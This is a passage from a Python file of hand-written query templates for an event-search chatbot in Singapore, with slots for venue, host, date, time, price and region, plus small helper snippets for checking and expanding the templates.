"Are there events by {event_host} near {venue_name}?",
"Are there events by {event_host} at {venue_name}?",
"Are there events near {venue_name} by {event_host} ?",
"Are there events at {venue_name} by {event_host} ?",
"What events would be organised by {event_host} near {venue_name}?",
"What events would be organised by {event_host} at {venue_name}?",
"What events near {venue_name} would be organised by {event_host}?",
"What events at {venue_name} would be organised by {event_host}?",
"Is {event_host} organising any events near {venue_name}?",
"Is {event_host} organising any events at {venue_name}?",
"What events are {event_host} organising near {venue_name}?",
"What events are {event_host} organising at {venue_name}?",
"What events near {venue_name} are {event_host} organising?",
"What events at {venue_name} are {event_host} organising?",
"Which event near {venue_name} is {event_host} an organiser of?",
"Which event at {venue_name} is {event_host} an organiser of?",
"Are there any events by the group {event_host} near {venue_name}?",
"Are there any events by the group {event_host} at {venue_name}?",
"Are there any events near {venue_name} by the group {event_host}?",
"Are there any events at {venue_name} by the group {event_host}?",
"Is the group {event_host} organising any events near {venue_name}?",
"Is the group {event_host} organising any events at {venue_name}?",
"Any events with {event_host} near {venue_name}?",
"Any events with {event_host} at {venue_name}?",
"Could you please recommend me some events organising by {event_host} near {venue_name}?",
"Could you please recommend me some events organising by {event_host} at {venue_name}?",
"Could you please recommend me some events near {venue_name} organising by {event_host}?",
"Could you please recommend me some events at {venue_name} organising by {event_host}?",
"Can you tell me events by {event_host} near {venue_name}?",
"Can you tell me events by {event_host} at {venue_name}?",
"Can you tell me events at {venue_name} by {event_host}?",
"Can you tell me events near {venue_name} by {event_host}?"
]
inform_venue_name_and_date_start_template = [
"I want to know what events are occurring on {date_start} at {venue_name}.",
"I want to know what events are occurring on {date_start} near {venue_name}.",
"I want to know what events are occurring at {venue_name} on {date_start}.",
"I want to know what events are occurring near {venue_name} on {date_start}.",
"Are there any events on {date_start} at {venue_name}?",
"Are there any events on {date_start} near {venue_name}?",
"Are there any events at {venue_name} on {date_start}?",
"Are there any events near {venue_name} on {date_start}?",
"What events on {date_start} are at {venue_name}?",
"What events on {date_start} are near {venue_name}?",
"What events at {venue_name} are on {date_start}?",
"What events near {venue_name} are on {date_start}?",
"Does {date_start} have events I at {venue_name}?",
"Does {date_start} have events I near {venue_name}?",
"Will there be any events on {date_start} at {venue_name}?",
"Will there be any events on {date_start} near {venue_name}?",
"Will there be any events at {venue_name} on {date_start}?",
"Will there be any events near {venue_name} on {date_start}?",
"Can you recommend me some events on {date_start} at {venue_name}?",
"Can you recommend me some events on {date_start} near {venue_name}?",
"Can you recommend me some events at {venue_name} on {date_start}?",
"Can you recommend me some events near {venue_name} on {date_start}?",
"Do you kow any events holding on {date_start} at {venue_name}?",
"Do you kow any events holding on {date_start} near {venue_name}?",
"Do you kow any events holding at {venue_name} on {date_start}?",
"Do you kow any events holding near {venue_name} on {date_start}?",
"Do you have any suggestions on events on {date_start} at {venue_name}?",
"Do you have any suggestions on events on {date_start} near {venue_name}?",
"Do you have any suggestions on events at {venue_name} on {date_start}?",
"Do you have any suggestions on events near {venue_name} on {date_start}?"
]
inform_venue_name_and_time_template = [
"I would like to know about events that are around {time} near {venue_name}.",
"I would like to know about events that are around {time} at {venue_name}.",
"I would like to know about events that are near {venue_name} around {time}.",
"I would like to know about events that are at {venue_name} around {time}.",
"Are there any events that start at {time} near {venue_name}?",
"Are there any events near {venue_name} that start at {time}?",
"Tell me about events around {time} near {venue_name}.",
"Tell me about events around {time} at {venue_name}.",
"Tell me about events near {venue_name} around {time}.",
"Tell me about events at {venue_name} around {time}.",
"Will there be any events around {time} near {venue_name}?",
"Will there be any events around {time} at {venue_name}?",
"Will there be any events near {venue_name} around {time}?",
"Will there be any events at {venue_name} around {time}?",
"I want to know if there are events at {time} near {venue_name}?",
"I want to know if there are events around {time} near {venue_name}?",
"I want to know if there are events around {time} at {venue_name}?",
"I want to know if there are events at {venue_name} around {time}?",
"Do you know any events start at {time} near {venue_name}?",
"Do you know any events start around {time} near {venue_name}?",
"Do you know any events start at around {time} near {venue_name}?",
"Do you know any events at {venue_name} start at around {time}?",
"Can you recommend any event begins around {time} near {venue_name}?",
"Can you recommend any event begins around {time} at {venue_name}?",
"Can you recommend any event begins near {venue_name} around {time}?",
"Can you recommend any event begins at {venue_name} around {time}?",
"Can I know some events at around {time} near {venue_name}?",
"Can I know some events at around {time} at {venue_name}?",
"Can I know some events near {venue_name} at around {time}?",
"Can I know some events at {venue_name} around {time}?",
]
inform_venue_name_and_price_template = [
"Do you know any free events at {venue_name}?",
"Do you know any free events near {venue_name}?",
"Tell me about some free events at {venue_name}.",
"Tell me about some free events near {venue_name}.",
"Can you recommend me some free events at {venue_name}?",
"Can you recommend me some free events near {venue_name}?",
"Do you have any suggestions for free events at {venue_name}?",
"Do you have any suggestions for free events near {venue_name}?",
"Are there any events around {price} dollars at {venue_name}.",
"Are there any events around {price} SGD at {venue_name}.",
"Are there any events around {price} dollars near {venue_name}.",
"Are there any events at {venue_name} around {price} dollars.",
"Are there any events at {venue_name} around {price} SGD.",
"Are there any events near {venue_name}, around {price} dollars.",
"Are there any events less than {price} dollars near {venue_name}.",
"Are there any events less than {price} SGD near {venue_name}.",
"Are there any events less than {price} dollars at {venue_name}.",
"Are there any events near {venue_name} less than {price} dollars.",
"Are there any events at {venue_name} less than {price} dollars.",
"Are there any events at {venue_name} less than {price} SGD.",
"Are there any events around ${price} at {venue_name}.",
"Are there any events around ${price} near {venue_name}.",
"Are there any events around {price} SGD near {venue_name}.",
"Are there any events at {venue_name} around ${price}.",
"Are there any events near {venue_name} around ${price}.",
"Are there any events near {venue_name} around {price} SGD.",
"I would like to find an event at {venue_name} that costs {price} dollars.",
"I would like to find an event near {venue_name} that costs {price} dollars.",
"I would like to find an event that costs {price} dollars at {venue_name}.",
"I would like to find an event that costs {price} dollars near {venue_name}.",
"I would like to find an event that costs {price} SGD near {venue_name}.",
"I would like to find an event that costs ${price} at {venue_name}.",
"I would like to find an event that costs ${price} near {venue_name}.",
"I would like to find an event at {venue_name} that costs ${price}.",
"Let me know if there are events at {venue_name} that are around {price} dollars.",
"Let me know if there are events at {venue_name} that are around {price} SGD.",
"Let me know if there are events near {venue_name} that are around {price} dollars.",
"Let me know if there are events that are around {price} dollars and are at {venue_name}.",
"Let me know if there are events that are around {price} dollars and are near {venue_name}.",
"Let me know if there are events at {venue_name} that are less than {price} dollars.",
"Let me know if there are events near {venue_name} that are less than {price} dollars.",
"Let me know if there are events that are less than {price} dollars at {venue_name}.",
"Let me know if there are events that are less than {price} dollars near {venue_name}.",
"Let me know if there are events that are around ${price} at {venue_name}.",
"Let me know if there are events that are around {price} SGD at {venue_name}.",
"Let me know if there are events that are around ${price} near {venue_name}.",
"Let me know if there are events that at {venue_name} are around ${price}.",
"Let me know if there are events that at {venue_name} are around {price} SGD.",
"Let me know if there are events near {venue_name} that are around ${price}.",
"Will there be events that cost less than {price} dollars near {venue_name}?",
"Will there be events that cost less than {price} dollars at {venue_name}?",
"Will there be events near {venue_name} that cost less than {price} dollars?",
"Will there be events near {venue_name} that cost less than {price} SGD?",
"Will there be events at {venue_name} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars at {venue_name}?",
"Will there be events that cost around {price} dollars near {venue_name}?",
"Will there be events that cost around {price} SGD near {venue_name}?",
"Will there be events at {venue_name} that cost around {price} dollars?",
"Will there be events at {venue_name} that cost around {price} SGD?",
"Will there be events near {venue_name} that cost around {price} dollars?",
"Will there be events that cost ${price} at {venue_name}?",
"Will there be events that cost {price} SGD at {venue_name}?",
"Will there be events that cost ${price} near {venue_name}?",
"Will there be events at {venue_name} that cost ${price}?",
"Will there be events near {venue_name} that cost ${price}?",
"Will there be events near {venue_name} that cost {price} SGD?"
]
inform_venue_name_and_is_weekend_template = [
"Tell me about events at {venue_name} that are on {is_weekend}.",
"Tell me about events near {venue_name} that are on {is_weekend}.",
"Tell me about events that are on {is_weekend} and at {venue_name}.",
"Tell me about events that are on {is_weekend} and near {venue_name}.",
"Which events take place on {is_weekend} near {venue_name}.",
"Which events take place on {is_weekend} at {venue_name}.",
"Which events at {venue_name} will take place on {is_weekend}.",
"Which events near {venue_name} will take place on {is_weekend}.",
"I would like to find an event that is on {is_weekend} at {venue_name}.",
"I would like to find an event that is on {is_weekend} near {venue_name}.",
"I would like to find an event at {venue_name} that is on {is_weekend}.",
"I would like to find an event near {venue_name} that is on {is_weekend}.",
"What events are conducted on {is_weekend} near {venue_name}.",
"What events are conducted on {is_weekend} at {venue_name}.",
"What events near {venue_name} are conducted on {is_weekend}.",
"What events at {venue_name} are conducted on {is_weekend}.",
"Will there be events that take place on {is_weekend} near {venue_name}?",
"Will there be events that take place on {is_weekend} at {venue_name}?",
"Will there be events near {venue_name} that take place on {is_weekend}?",
"Will there be events at {venue_name} that take place on {is_weekend}?",
"I want to know the events near {venue_name} that are available on {is_weekend}.",
"I want to know the events at {venue_name} that are available on {is_weekend}.",
"I want to know the events that are available on {is_weekend} and near {venue_name}.",
"I want to know the events that are available on {is_weekend} and are at {venue_name}.",
"Can you recommend some events on {is_weekend} near {venue_name}?",
"Can you recommend some events on {is_weekend} at {venue_name}?",
"Can you recommend some events near {venue_name} on {is_weekend}?",
"Can you recommend some events at {venue_name} on {is_weekend}?",
"Do you have any suggestions on events near {venue_name} on {is_weekend}?",
"Do you have any suggestions on events at {venue_name} on {is_weekend}?",
"I want to find some events on {is_weekend} near {venue_name}.",
"I want to find some events on {is_weekend} at {venue_name}.",
"I want to find some events near {venue_name} on {is_weekend}.",
"I want to find some events at {venue_name} on {is_weekend}."
]
inform_venue_name_and_part_of_day_template = [
"Tell me about events near {venue_name} that are in {part_of_day}.",
"Tell me about events at {venue_name} that are in {part_of_day}.",
"Tell me about events that are in {part_of_day} near {venue_name}.",
"Tell me about events that are in {part_of_day} at {venue_name}.",
"Which events take place on {part_of_day} at {venue_name}.",
"Which events take place on {part_of_day} near {venue_name}.",
"Which events take place at {venue_name} on {part_of_day}.",
"Which events take place near {venue_name} on {part_of_day}.",
"Which events at {venue_name} take place on {part_of_day}.",
"Which events near {venue_name} take place on {part_of_day}.",
"I would like to find an event that is in {part_of_day} near {venue_name}.",
"I would like to find an event that is in {part_of_day} at {venue_name}.",
"I would like to find an event near {venue_name} that is in {part_of_day}.",
"I would like to find an event at {venue_name} that is in {part_of_day}.",
"What events are conducted on {part_of_day} near {venue_name}.",
"What events are conducted on {part_of_day} at {venue_name}.",
"What events near {venue_name} are conducted on {part_of_day}.",
"What events at {venue_name} are conducted on {part_of_day}.",
"Will there be events that take place in {part_of_day} near {venue_name}?",
"Will there be events that take place in {part_of_day} at {venue_name}?",
"Will there be events near {venue_name} that take place in {part_of_day}?",
"Will there be events at {venue_name} that take place in {part_of_day}?",
"I want to know the events near {venue_name} that are available in {part_of_day}.",
"I want to know the events at {venue_name} that are available in {part_of_day}.",
"I want to know the events that are available in {part_of_day} near {venue_name}.",
"I want to know the events that are available in {part_of_day} at {venue_name}.",
"Can you recommend some events start at {part_of_day} near {venue_name}?",
"Can you recommend some events start at {part_of_day} at {venue_name}?",
"Can you recommend some events near {venue_name} start at {part_of_day}?",
"Can you recommend some events at {venue_name} start at {part_of_day}?",
"Do you know any events begins in {part_of_day} near {venue_name}?",
"Do you know any events begins in {part_of_day} at {venue_name}?",
"Do you know any events near {venue_name} begins in {part_of_day}?",
"Do you know any events at {venue_name} begins in {part_of_day}?",
"Do you have any suggestions on events in {part_of_day} near {venue_name}?",
"Do you have any suggestions on events in {part_of_day} at {venue_name}?",
"Do you have any suggestions on events near {venue_name} in {part_of_day}?",
"Do you have any suggestions on events at {venue_name} in {part_of_day}?",
"I want to find some events in {part_of_day} near {venue_name}.",
"I want to find some events in {part_of_day} at {venue_name}.",
"I want to find some events near {venue_name} in {part_of_day}.",
"I want to find some events at {venue_name} in {part_of_day}."
]
inform_region_and_event_host_template = [
"Are there events by {event_host} in the {region} region?",
"Are there events by {event_host} in the {region} area?",
"Are there events by {event_host} in the {region} region of Singapore?",
"Are there events by {event_host} in the {region}?",
"Are there events in the {region} region by {event_host}?",
"Are there events in the {region} area by {event_host}?",
"Are there events in the {region} region of Singapore by {event_host}?",
"Are there events in the {region} by {event_host}?",
"What events would be organised by {event_host} in the {region}?",
"What events would be organised by {event_host} in the {region} region?",
"What events would be organised by {event_host} in the {region} area?",
"What events would be organised by {event_host} in the {region} of Singapore?",
"What events in the {region} would be organised by {event_host}?",
"What events in the {region} region would be organised by {event_host}?",
"What events in the {region} area would be organised by {event_host}?",
"What events in the {region} of Singapore would be organised by {event_host}?",
"Is {event_host} organising any events in the {region}?",
"Is {event_host} organising any events in the {region} region?",
"Is {event_host} organising any events in the {region} area?",
"Is {event_host} organising any events in the {region} of Singapore?",
"Is {event_host} organising any events in the {region} area of Singapore?",
"What events are {event_host} organising in the {region}?",
"What events are {event_host} organising in the {region} area?",
"What events are {event_host} organising in the {region} region?",
"What events are {event_host} organising in the {region} region of Singapore?",
"What events in the {region} are {event_host} organising?",
"What events in the {region} area are {event_host} organising?",
"What events in the {region} region are {event_host} organising?",
"What events in the {region} region of Singapore are {event_host} organising?",
"Which event in the {region} is {event_host} an organiser of?",
"Which event in the {region} region is {event_host} an organiser of?",
"Which event in the {region} area is {event_host} an organiser of?",
"Which event in the {region} of Singapore is {event_host} an organiser of?",
"Which event is {event_host} an organiser of in the {region}?",
"Which event is {event_host} an organiser of in the {region} region?",
"Which event is {event_host} an organiser of in the {region} area?",
"Which event is {event_host} an organiser of in the {region} of Singapore?",
"Are there any events in the {region} by the group {event_host}?",
"Are there any events in the {region} region by the group {event_host}?",
"Are there any events in the {region} area by the group {event_host}?",
"Are there any events in the {region} area of Singapore by the group {event_host}?",
"Are there any events in the {region} of Singapore by the group {event_host}?",
"Are there any events by the group {event_host} in the {region}?",
"Are there any events by the group {event_host} in the {region} region?",
"Are there any events by the group {event_host} in the {region} area?",
"Are there any events by the group {event_host} in the {region} region of Singapore?",
"Are there any events by the group {event_host} in the {region} of Singapore?",
"Is the group {event_host} organising any events in the {region}?",
"Is the group {event_host} organising any events in the {region} area?",
"Is the group {event_host} organising any events in the {region} region?",
"Is the group {event_host} organising any events in the {region} of Singapore?",
"Is the group {event_host} organising any events in the {region} region of Singapore?",
"Any events with {event_host} in the {region}?",
"Any events with {event_host} in the {region} region?",
"Any events with {event_host} in the {region} area?",
"Any events with {event_host} in the {region} of Singapore?",
"Any events in the {region} of Singapore with {event_host}?",
"Any events in the {region} area of Singapore with {event_host}?",
"Any events in the {region} area with {event_host}?",
"Any events in the {region} region with {event_host}?",
"Any events in the {region} with {event_host}?",
"Could you please recommend me some events organising by {event_host} in the {region}?",
"Could you please recommend me some events organising by {event_host} in the {region} region?",
"Could you please recommend me some events organising by {event_host} in the {region} area?",
"Could you please recommend me some events organising by {event_host} in the {region} of Singapore?",
"Could you please recommend me some events organising by {event_host} in the {region} area of Singapore?",
"Could you please recommend me some events organising by {event_host} in the {region} region of Singapore?",
"Could you please recommend me some events in the {region} organising by {event_host}?",
"Could you please recommend me some events in the {region} region organising by {event_host}?",
"Could you please recommend me some events in the {region} area organising by {event_host}?",
"Could you please recommend me some events in the {region} of Singapore organising by {event_host}?",
"Could you please recommend me some events in the {region} area of Singapore organising by {event_host}?",
"Could you please recommend me some events in the {region} region of Singapore organising by {event_host}?",
"Can you tell me events by {event_host} in the {region}?",
"Can you tell me events by {event_host} in the {region} region?",
"Can you tell me events by {event_host} in the {region} area?",
"Can you tell me events by {event_host} in the {region} of Singapore?",
"Can you tell me events in the {region} by {event_host}?",
"Can you tell me events in the {region} region by {event_host}?",
"Can you tell me events in the {region} area by {event_host}?",
"Can you tell me events in the {region} of Singapore by {event_host}?"
]
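# Because these template lists are hand-written, misspelled or missing
# placeholders are easy to introduce. A small sanity-check sketch (the
# function name and the expected-slot sets are illustrative):
from string import Formatter

def check_placeholders(templates, expected):
    """Return the templates missing any of the expected placeholders."""
    bad = []
    for template in templates:
        found = {name for _, name, _, _ in Formatter().parse(template) if name}
        if not expected <= found:
            bad.append(template)
    return bad

# check_placeholders(inform_region_and_event_host_template,
#                    {"region", "event_host"})  # should be []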
inform_region_and_date_start_template = [
"I want to know what events are occurring on {date_start} in the {region}.",
"I want to know what events are occurring on {date_start} in the {region} region.",
"I want to know what events are occurring on {date_start} in the {region} area.",
"I want to know what events are occurring on {date_start} in the {region} region of Singapore.",
"I want to know what events are occurring on {date_start} in the {region} of Singapore.",
"I want to know what events in the {region} are occurring on {date_start}.",
"I want to know what events in the {region} region are occurring on {date_start}.",
"I want to know what events in the {region} area are occurring on {date_start}.",
"I want to know what events in the {region} area of Singapore are occurring on {date_start}.",
"I want to know what events in the {region} of Singapore are occurring on {date_start}.",
"Are there any events on {date_start} in the {region}?",
"Are there any events on {date_start} in the {region} area?",
"Are there any events on {date_start} in the {region} region?",
"Are there any events on {date_start} in the {region} area of Singapore?",
"Are there any events on {date_start} in the {region} region of Singapore?",
"Are there any events on {date_start} in the {region} of Singapore?",
"Are there any events in the {region} on {date_start}?",
"Are there any events in the {region} area on {date_start}?",
"Are there any events in the {region} region on {date_start}?",
"Are there any events in the {region} area of Singapore on {date_start}?",
"Are there any events in the {region} region of Singapore on {date_start}?",
"Are there any events in the {region} of Singapore on {date_start}?",
"What events are on {date_start} in the {region}?",
"What events are on {date_start} in the {region} area?",
"What events are on {date_start} in the {region} region?",
"What events are on {date_start} in the {region} of Singapore?",
"What events are on {date_start} in the {region} region of Singapore?",
"What events in the {region} are on {date_start}?",
"What events in the {region} area are on {date_start}?",
"What events in the {region} region are on {date_start}?",
"What events in the {region} of Singapore are on {date_start}?",
"What events in the {region} region of Singapore are on {date_start}?",
"Does {date_start} have events in the {region} I can attend?",
"Does {date_start} have events in the {region} region I can attend?",
"Does {date_start} have events in the {region} area I can attend?",
"Does {date_start} have events in the {region} of Singapore I can attend?",
"Does {date_start} have events in the {region} area of Singapore I can attend?",
"Will there be any events on {date_start} in the {region}?",
"Will there be any events on {date_start} in the {region} region?",
"Will there be any events on {date_start} in the {region} area?",
"Will there be any events on {date_start} in the {region} region of Singapore?",
"Will there be any events on {date_start} in the {region} of Singapore?",
"Will there be any events in the {region} on {date_start}?",
"Will there be any events in the {region} region on {date_start}?",
"Will there be any events in the {region} area on {date_start}?",
"Will there be any events in the {region} area of Singapore on {date_start}?",
"Will there be any events in the {region} of Singapore on {date_start}?",
"Can you recommend me some events on {date_start} in the {region}?",
"Can you recommend me some events on {date_start} in the {region} region?",
"Can you recommend me some events on {date_start} in the {region} area?",
"Can you recommend me some events on {date_start} in the {region} of Singapore?",
"Can you recommend me some events on {date_start} in the {region} region of Singapore?",
"Can you recommend me some events in the {region} on {date_start}?",
"Can you recommend me some events in the {region} region on {date_start}?",
"Can you recommend me some events in the {region} area on {date_start}?",
"Can you recommend me some events in the {region} of Singapore on {date_start}?",
"Can you recommend me some events in the {region} area of Singapore on {date_start}?",
"Do you kow any events holding on {date_start} in the {region}?",
"Do you kow any events holding on {date_start} in the {region} region?",
"Do you kow any events holding on {date_start} in the {region} area?",
"Do you kow any events holding on {date_start} in the {region} region of Singapore?",
"Do you kow any events holding on {date_start} in the {region} of Singapore?",
"Do you kow any events holding on {date_start} in the {region} area of Singapore?",
"Do you kow any events holding in the {region} on {date_start}?",
"Do you kow any events holding in the {region} region on {date_start}?",
"Do you kow any events holding in the {region} area on {date_start}?",
"Do you kow any events holding in the {region} region of Singapore on {date_start}?",
"Do you kow any events holding in the {region} of Singapore on {date_start}?",
"Do you kow any events holding in the {region} area of Singapore on {date_start}?",
"Do you have any suggestions on events on {date_start} in the {region}?",
"Do you have any suggestions on events on {date_start} in the {region} region?",
"Do you have any suggestions on events on {date_start} in the {region} area?",
"Do you have any suggestions on events on {date_start} in the {region} of Singapore?",
"Do you have any suggestions on events on {date_start} in the {region} region of Singapore?",
"Do you have any suggestions on events in the {region} on {date_start}?",
"Do you have any suggestions on events in the {region} region on {date_start}?",
"Do you have any suggestions on events in the {region} area on {date_start}?",
"Do you have any suggestions on events in the {region} of Singapore on {date_start}?",
"Do you have any suggestions on events in the {region} area of Singapore on {date_start}?"
]
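# Every inform_region_* list cycles through the same location surface forms
# ("the {region}", "the {region} region", "the {region} area", ...). One
# hedged way to keep future additions consistent is to expand a base pattern
# over those forms; {region_form} below is an illustrative convention, not a
# placeholder used by the lists in this file:
REGION_FORMS = [
    "the {region}",
    "the {region} region",
    "the {region} area",
    "the {region} of Singapore",
    "the {region} region of Singapore",
    "the {region} area of Singapore",
]

def with_region_forms(base):
    """Expand one base pattern into one template per location surface form."""
    return [base.replace("{region_form}", form) for form in REGION_FORMS]

# with_region_forms("Are there any events on {date_start} in {region_form}?")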
inform_region_and_time_template = [
"I would like to know about events that are around {time} in the {region}.",
"I would like to know about events that are around {time} in the {region} region.",
"I would like to know about events that are around {time} in the {region} area.",
"I would like to know about events that are around {time} in the {region} of Singapore.",
"I would like to know about events that are around {time} in the {region} region of Singapore.",
"I would like to know about events in the {region} that are around {time}.",
"I would like to know about events in the {region} region that are around {time}.",
"I would like to know about events in the {region} area that are around {time}.",
"I would like to know about events in the {region} of Singapore that are around {time}.",
"I would like to know about events in the {region} region of Singapore that are around {time}.",
"Are there any events that start at {time} in the {region}?",
"Are there any events that start at {time} in the {region} area?",
"Are there any events that start at {time} in the {region} region?",
"Are there any events that start at {time} in the {region} of Singapore?",
"Are there any events that start at {time} in the {region} area of Singapore?",
"Are there any events that start at {time} in the {region} region of Singapore?",
"Are there any events in the {region} that start at {time}?",
"Are there any events in the {region} area that start at {time}?",
"Are there any events in the {region} region that start at {time}?",
"Are there any events in the {region} of Singapore that start at {time}?",
"Are there any events in the {region} area of Singapore that start at {time}?",
"Are there any events in the {region} region of Singapore that start at {time}?",
"Tell me about events around {time} in the {region}.",
"Tell me about events around {time} in the {region} region.",
"Tell me about events around {time} in the {region} area.",
"Tell me about events around {time} in the {region} of Singapore.",
"Tell me about events around {time} in the {region} region of Singapore.",
"Tell me about events in the {region} around {time}.",
"Tell me about events in the {region} region around {time}.",
"Tell me about events in the {region} area around {time}.",
"Tell me about events in the {region} of Singapore around {time}.",
"Tell me about events in the {region} region of Singapore around {time}.",
"Will there be any events around {time} in the {region}?",
"Will there be any events around {time} in the {region} region?",
"Will there be any events around {time} in the {region} area?",
"Will there be any events around {time} in the {region} of Singapore?",
"Will there be any events around {time} in the {region} region of Singapore?",
"Will there be any events around {time} in the {region} area of Singapore?",
"Will there be any events in the {region} around {time}?",
"Will there be any events in the {region} region around {time}?",
"Will there be any events in the {region} area around {time}?",
"Will there be any events in the {region} of Singapore around {time}?",
"Will there be any events in the {region} region of Singapore around {time}?",
"Will there be any events in the {region} area of Singapore around {time}?",
"I want to know if there are events at {time} in the {region}?",
"I want to know if there are events at {time} in the {region} region?",
"I want to know if there are events at {time} in the {region} area?",
"I want to know if there are events at {time} in the {region} of Singapore?",
"I want to know if there are events at {time} in the {region} region of Singapore?",
"I want to know if there are events at {time} in the {region} area of Singapore?",
"I want to know if there are events in the {region} at {time}?",
"I want to know if there are events in the {region} region at {time}?",
"I want to know if there are events in the {region} area at {time}?",
"I want to know if there are events in the {region} of Singapore at {time}?",
"I want to know if there are events in the {region} region of Singapore at {time}?",
"I want to know if there are events in the {region} area of Singapore at {time}?",
"Do you know any events start at {time} in the {region}?",
"Do you know any events start at {time} in the {region} region?",
"Do you know any events start at {time} in the {region} area?",
"Do you know any events start at {time} in the {region} of Singapore?",
"Do you know any events start at {time} in the {region} region of Singapore?",
"Do you know any events start at {time} in the {region} area of Singapore?",
"Do you know any events in the {region} start at {time}?",
"Do you know any events in the {region} region start at {time}?",
"Do you know any events in the {region} area start at {time}?",
"Do you know any events in the {region} of Singapore start at {time}?",
"Do you know any events in the {region} region of Singapore start at {time}?",
"Do you know any events in the {region} area of Singapore start at {time}?",
"Can you recommend any event begins around {time} in the {region}?",
"Can you recommend any event begins around {time} in the {region} region?",
"Can you recommend any event begins around {time} in the {region} area?",
"Can you recommend any event begins around {time} in the {region} of Singapore?",
"Can you recommend any event begins around {time} in the {region} area of Singapore?",
"Can you recommend any event in the {region} begins around {time}?",
"Can you recommend any event in the {region} region begins around {time}?",
"Can you recommend any event in the {region} area begins around {time}?",
"Can you recommend any event in the {region} of Singapore begins around {time}?",
"Can you recommend any event in the {region} region of Singapore begins around {time}?",
"Can I know some events at around {time} in the {region}?",
"Can I know some events at around {time} in the {region} region?",
"Can I know some events at around {time} in the {region} area?",
"Can I know some events at around {time} in the {region} of Singapore?",
"Can I know some events at around {time} in the {region} region of Singapore?",
"Can I know some events at around {time} in the {region} area of Singapore?",
"Can I know some events in the {region} at around {time}?",
"Can I know some events in the {region} region at around {time}?",
"Can I know some events in the {region} area at around {time}?",
"Can I know some events in the {region} of Singapore at around {time}?",
"Can I know some events in the {region} region of Singapore at around {time}?",
"Can I know some events in the {region} area of Singapore at around {time}?"
]
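# For NLU training data it is common to realise every paraphrase of one slot
# assignment at once. A minimal sketch (expand_all and the slot values are
# illustrative):
def expand_all(templates, **slots):
    """Fill every template in the list with the same slot values."""
    return [template.format(**slots) for template in templates]

# expand_all(inform_region_and_time_template, region="east", time="7 pm")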
inform_region_and_price_template = [
"I would like to know about events that are around {price} dollars in the {region}.",
"I would like to know about events that are around {price} dollar in the {region} region.",
"I would like to know about events that are around {price} SGD in the {region} area.",
"I would like to know about events that are around ${price} in the {region} of Singapore.",
"I would like to know about events that are around {price} dollars in the {region} region of Singapore.",
"I would like to know about events that are around {price} dollar in the {region} area of Singapore.",
"I would like to know about events in the {region} that are around {price} SGD.",
"I would like to know about events in the {region} region that are around {price} SGD.",
"I would like to know about events in the {region} area that are around {price} dollar.",
"I would like to know about events in the {region} of Singapore that are around {price} dollars.",
"I would like to know about events in the {region} region of Singapore that are around {price} SGD.",
"I would like to know about events in the {region} area of Singapore that are around ${price}.",
"Are there any events that start at ${price} in the {region}?",
"Are there any events that start at {price} dollar in the {region} region?",
"Are there any events that start at {price} dollars in the {region} area?",
"Are there any events that start at {price} SGD in the {region} region of Singapore?",
"Are there any events that start at ${price} in the {region} area of Singapore?",
"Are there any events that start at {price} SGD in the {region} of Singapore?",
"Are there any events in the {region} that start at {price} dollars?",
"Are there any events in the {region} region that start at {price} dollar?",
"Are there any events in the {region} area that start at ${price}?",
"Are there any events in the {region} region of Singapore that start at {price} dollars?",
"Are there any events in the {region} area of Singapore that start at {price} dollar?",
"Are there any events in the {region} of Singapore that start at {price} SGD?",
"Tell me about events around ${price} in the {region}.",
"Tell me about events around {price} dollar in the {region} region.",
"Tell me about events around {price} dollars in the {region} area.",
"Tell me about events around {price} SGD in the {region} of Singapore.",
"Tell me about events around ${price} in the {region} region of Singapore.",
"Tell me about events around {price} SGD in the {region} area of Singapore.",
"Tell me about events in the {region} dollar around {price}.",
"Tell me about events in the {region} dollars region around {price}.",
"Tell me about events in the {region} area around ${price}.",
"Tell me about events in the {region} of Singapore around ${price}.",
"Tell me about events in the {region} SGD region of Singapore around {price}.",
"Tell me about events in the {region} dollars area of Singapore around {price}.",
"Will there be any events around ${price} in the {region}?",
"Will there be any events around {price} dollar in the {region} region?",
"Will there be any events around {price} SGD in the {region} area?",
"Will there be any events around {price} dollars in the {region} of Singapore?",
"Will there be any events around ${price} in the {region} region of Singapore?",
"Will there be any events in the {region} around {price} dollars?",
"Will there be any events in the {region} region around {price} dollar?",
"Will there be any events in the {region} area around {price} SGD?",
"Will there be any events in the {region} of Singapore around ${price}?",
"Will there be any events in the {region} area of Singapore around ${price}?",
"I want to know if there are events at ${price} in the {region}?",
"I want to know if there are events at {price} SGD in the {region} region?",
"I want to know if there are events at {price} SGD in the {region} area?",
"I want to know if there are events at {price} dollars in the {region} of Singapore?",
"I want to know if there are events at {price} dollar in the {region} region of Singapore?",
"I want to know if there are events at ${price} in the {region} area of Singapore?",
"I want to know if there are events in the {region} at ${price}?",
"I want to know if there are events in the {region} region at {price} SGD?",
"I want to know if there are events in the {region} area at {price} dollars?",
"I want to know if there are events in the {region} of Singapore at {price} dollar?",
"I want to know if there are events in the {region} region of Singapore at ${price}?",
"I want to know if there are events in the {region} area of Singapore at {price} SGD?",
"Do you know any events start at {price} SGD in the {region}?",
"Do you know any events start at {price} dollars in the {region} region?",
"Do you know any events start at {price} dollar in the {region} area?",
"Do you know any events start at ${price} in the {region} of Singapore?",
"Do you know any events start at {price} SGD in the {region} region of Singapore?",
"Do you know any events in the {region} start at {price} SGD?",
"Do you know any events in the {region} region start at {price} dollar?",
"Do you know any events in the {region} area start at {price} dollars?",
"Do you know any events in the {region} of Singapore start at ${price}?",
"Do you know any events in the {region} area of Singapore start at ${price}?",
"Can you recommend any event begins around {price} SGD in the {region}?",
"Can you recommend any event begins around {price} SGD in the {region} region?",
"Can you recommend any event begins around {price} dollars in the {region} area?",
"Can you recommend any event begins around {price} dollar in the {region} of Singapore?",
"Can you recommend any event begins around ${price} in the {region} region of Singapore?",
"Can you recommend any event begins around ${price} in the {region} area of Singapore?",
"Can you recommend any event in the {region} begins around {price} dollar?",
"Can you recommend any event in the {region} region begins around {price} dollars?",
"Can you recommend any event in the {region} area begins around {price} SGD?",
"Can you recommend any event in the {region} of Singapore begins around {price} SGD?",
"Can you recommend any event in the {region} region of Singapore begins around ${price}?",
"Can you recommend any event in the {region} area of Singapore begins around ${price}?",
"Can I know some events at around ${price} in the {region}?",
"Can I know some events at around {price} SGD in the {region} region?",
"Can I know some events at around {price} dollars in the {region} area?",
"Can I know some events at around {price} dollar in the {region} of Singapore?",
"Can I know some events at around {price} SGD in the {region} region of Singapore?",
"Can I know some events at around ${price} in the {region} area of Singapore?",
"Can I know some events in the {region} at around {price} SGD?",
"Can I know some events in the {region} region at around {price} dollars?",
"Can I know some events in the {region} area at around {price} dollar?",
